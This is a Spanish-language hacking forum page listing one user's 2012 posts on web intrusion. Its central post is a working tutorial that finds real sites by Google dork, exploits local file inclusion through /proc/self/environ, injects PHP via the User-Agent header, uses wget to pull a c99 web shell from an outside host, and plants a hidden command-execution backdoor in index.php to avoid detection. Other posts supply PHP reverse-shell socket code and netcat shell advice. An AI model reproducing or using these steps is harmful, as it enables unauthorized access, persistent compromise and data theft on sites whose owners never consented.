Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Mensajes - Muppet

#281
Dudas y pedidos generales / Re:Defacing
Julio 27, 2012, 01:11:40 PM
Primero que nada estas en la seccion equivocada, porq lo q quieres hacker segun dices es un Servidor, que corre Servicios, que pueden o no ser Vulnerables, pasate por la seccion WebApps Security And Hacking, busca informacion de redes y protocolos, Que es un servicio, los puertos donde corren, si la la web es vulnerable a SQL Injectio, Local File Incusion, Remote File Inclusion, Si puedes Listar Contenido Arbitrariamente, Si Puedes Descargar Archivos en base a un fallo de filtrado en Download.php (archivo de descarga, el nombre puede variar), si es vulnerable a XSS o a CSRF, intentar conocer la estructura de Directorios del Servidor, Puedes Hacerlo con Wget o DirBuster, buscar las versiones de los servicios q se ejecutan en cada puerto y buscar algun fallo en ellos, revisar si la cabeza HTTP Filtra PUT, Tienes mucho q investigar, ningun manual ni programa te va a decir la pura verdad, tu lee todo lo q encuentres y create tus propias ideas, estrategias, aprende algo de Scripting para armarte algunas herramientas, aprende lo q es una WebShell, aprende lo necesario de Perl y PHP aunq sea minimo para poder enteder q hace una web al ejecutarce (esta de mas decir html, asp, etc), estudia no te larges de una a jugartelas de hacker, porq van a pasar 2 cosas, vas a usar herramientas y nisiquiera vas a saber q estas haciendo y no vas a lugrar ningun resultado mas q sentirte ignorante, o q si logras algo y no estas detras de un proxy o vpn te caiga la Policia, o te demanden, o simplemente no concigas lo q buscaste. Aqui Cite algunos de los Ataques q deberias Aprender, tambien existe SSI (Server Side Injection), leete los papers que ahi en la seccion sobre PHP:Input y Proc/self/environ para explitar LFI, Saludos y Que Nunca Muera tu Curiosidad, porq eso hace al hacker por eso se dice q el hacker nace, porq el hacker tiene la peculiar caracteristica de ser muy curioso y busca comprender el funcionamiento todo, y la poblacion General carece de Curiosidad
#282
Diseño UX/UI / Re:Pide tu firma Underc0de!
Julio 22, 2012, 07:52:12 PM
Gracias
#283
Diseño UX/UI / Re:Pide tu firma Underc0de!
Julio 21, 2012, 06:06:33 PM
Podrian hacerme una q ademas diga mi blog? esta genial la idea!
#284
Ya la Probe Muy Buena, Se Agradece!
#285
Se Desvio del Tema Central
#286
Con un RFI solo es necesario tener un archivo con una WebShell en algun servidor para llamarlo directamente desde el RFI.
#287
Buen Aporte! gracias!
#288
Leyendo el Post de CalebBuker sobre LFI atrasves de No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
desidi hacer un tutorial de otro metodo para concegir subir una shell por medio de LFI
utilizando injecciones php atraves de una vulnerabilidad en el /proc/self/environ
Empecemos:

Primero Buscamos con un dork alguna web Vulnerable a LFI

Dork:

inurl:*.php?page=* site:.com.ar

Vamos probando hasta encontrar una q al incluir /etc/passwd nos muestra su contenido
En este caso:

http://sitiovulnerable/index.php?page=/etc/passwd



Damos como parametro a incluir /proc/self/environ y vemos el siguien resultado

http://sitiovulnerable/index.php?page=/proc/self/environ



Nos vamos a Mozilla Firefox y abrimos el addon Tamper Data:

Damos clik en Start Tamper y volvemos a realizar la Peticion al sitio web

Atrapa el Primer "pakete" y nos sale el siguiente cartel



Desactivamos la casilla "Continue Tampering" y Damos Click en Tamper, modificamos el Parametro User-Agent intrudiciendo algun Codigo php, de Prueba, Yo intentare con <? System('ls'); ?> para ver si logramos listar el contenido de host.



Damos Click en OK y vemos q el codigo php se ejecuta correctamente y lista los archivos y directorios de la web Vulnerable:



Ahora Sabemos que se puede ejecutar Codigo Shell atraves de php con el comando system,exec,etc (si no funcionace reciviriamos un mensaje diciendo q la funcion system() a sido deshabilitada por razones de seguridad)

Subiremos Nuestra Shell, de la siguiente forma.

Abriremos Tamper Data y comensaremos a Capturar.
Repetiremos la Peticion al host:
http://sitiovulnerable/index.php?page=/proc/self/environ
Modificaremos el Parametro User-Agent para que ejecute Wget y descarge una shell en txt de donde sea que este alojada con el siguiente codigo php

<? system('wget http://SitioDeLaShell/shell.txt'); ?>



Repetimos la Operacion Con Tamper Data y Comprobamos q nuestra shell se subio correctamente pasando como parametro en User-Agent

<? system('ls'); ?>

Vemos que dentro de la lista de archivos del host aparece nuestra shell



Convertiremos Nuestro txt, en un archivo php, repitiendo la operacion con Tamper Data y pasando como Parametro de User-Agent

<? system('mv c99.txt s.php'); ?>

Una ves Hecho Esto repetimos el procedimiento con tamper data para listar nuestros archivos, para ver si el proceso anterior Termino Correctamente:

<? system('ls'); ?>



Como vemos el archivo fue Renombrado Correctamente, solo nos queda vistar nuestro archivo por medio de la URL

http://sitiovulerable/s.php

)

Como vemos la ejecucion de la shellphp, se ejecuto Correctamente. Como es un Sitio Importante y no queremos q nos detecten, introduciremos un backdoor dentro del codigo de algun archivo, yo elegi index.php



Les Dejo el code del backdoor q arme:

Código: text
<?php
if($_GET['active']=='si'){
system( $_GET['c']);
}
?>


Lo Introduciremos dentro de index.php y al llamarlo desde

http://SutioVulnerable/index.php?c=ls&active=si

nos mostrara el resultado de la ejecucion del parametro q pasemos.



Solo nos queda Eliminar s.php con el comando rm s.php por medio de nuestro backdoor

http://SutioVulnerable/index.php?c=rm s.php&active=si

Listamos el Contenido del Host

http://SutioVulnerable/index.php?c=ls&active=si

y vemos q s.php ha desaparecido.



Espero que este tutorial les halla servido, HD_Breaker

Renuncia: No me hago Responsable del Uso que le den a este tutorial, su contenido es puramente educativo
#289
Buen Aporte, Gracias!
#290
Exelente Aporte!
#291
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Que onda man! bueno andaba probando y mire tu shell pero no pude entrar aunque los datos para entrar a tu shell fueran user y pass no pude! pero bueno entonces lo que hice fue en la shell que estaba utilizando la c99 le di en bind ahi dice para conectarse bind o backconnect bueno intente con el backconnect pero nada! entonces intente con la bind y cuando estoy conectandome en el netcat me manda conecction refused!
delta.xxxxxxxxx.com.ar [176.31.77.xxx] 11xxx (?): connection refused
Me podrias decir que puedo hacer!
ah por cierto quise intentar subir el reversheshell que pusistes en el server pero no lo encontre no me lo da en el directorio me podrias pasar el nombre de tu shell? para probar igualmente gracias me parecio interesante el articulo y quise probar je! saludos

Con un bind coneccion muy rara ves vas a tener shell, ya que depende de q el puerto este desocupado y al mismo tiempo abierto en el router/modem cosa q muy rara vez pasa, y la reverse shell q puse esta en perl y la tienes q ejecutar con, perl host puerto -l (para linux) -w (para windows)
#292
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
he probado con los puertos 888 y 31337 también, aquí te dejo la prueba de que está abierto:



y el netcat lo dejo asi:

Saludos y gracias

Caundo usas el reverse shell apuntas a tu no-ip, dyndns, etc??
#293
Back-end / Re:Php Reverse Shell Socket Duda.
Julio 13, 2012, 12:20:53 AM
Creo haberlo reparado, ahora no tengo la posibilidad de testearlo porq no estoy en mi casa y no cuento con una ip fija, si alguien lo prueba escriba si funciono, Gracias Cronos!
#294
Tenes q usar numeros de puertos altos en el netcat,  si no tienes una ip fija debes correr algun servicio como No-Ip o DynDns para mantener tu ip Dynamica aputando a un host, y tener los puertos q abris con netcat en tu pc, abiertos en el modem/router.
#295
Back-end / Php Reverse Shell Socket Duda.
Julio 11, 2012, 04:33:57 PM
Bueno Arme esta php shell que en un principio no me funcionaba, gracias a la ayuda de Cronos creo q quedo funcionando, apenas pueda la pruebo!

Código: php
<html>
<body>
<center>
<form method="post">
Ip:<br>
<input name="ip" type="text" id="ip"/><br>
Port:<br>
<input name="port" type="text" id="port"/><br>
<input type="submit" value="submit"/>
</form>
</center>
</body>
</html>

<?php
$ip = $_POST['ip'];
$port = $_POST['port'];
if($ip != "" && $ip != 0) {
$sock = fsockopen ("$ip", $port);
fputs($sock, "Password: ");
}
while($cmd != 0) {
$log = fgets($sock, $port);
$log2 = md5($log);
if($log2 == "5e2c8ac9008420e9ac3c008bef292c01") {
    fputs($sock, "Comando: ");
    $cmd = fgets($sock, $port);       
if($cmd) {

$result = shell_exec('$cmd');
fputs($sock, "$result");

}}else{
echo "Acceso Denegado";
}}
?>
#296
Back-end / Re:Mailer PHP HD_Breaker
Julio 11, 2012, 04:30:20 PM
Disculpa, lo tenia colocado en el servidor y no en el archivo de mi disco.
Steal IP:
Código: php
<?php
$ip = $_SERVER['REMOTE_ADDR'];
$fp = fopen("ip.txt","a");
fwrite($fp, "Ip: $ip" . PHP_EOL);
fclose($fp);
?>


eso simplemente y nos queda ordenado en el archivo ip.txt, yo lo agrege al mai.php
#297
Back-end / Re:Mailer PHP HD_Breaker
Julio 09, 2012, 11:01:28 PM
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Pues nop, aparece la sgte descarga no està disponible No tienes permitido ver los links. Registrarse o Entrar a mi cuenta | 0.00 MB

ademas de que no sale q tenga peso alguno, si ves sale 0.00 MB.....

Ante la duda lo subi a filefactory
#298
Back-end / Re:Mailer PHP HD_Breaker
Julio 09, 2012, 10:29:22 PM
El link funciona a la perfeccion
#299
Muy bueno Gracias!
#300
Back-end / Mailer PHP HD_Breaker
Julio 09, 2012, 07:16:57 PM
Bueno, comencé a aprender php, y decidi armar un Mailer.
Tiene un Panel de Acceso y un Steal de IP por si algún Agente no deseado logra acceder, uds posean su ip.

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta



Link Reparado Se agrego funcion html y Lista de Correos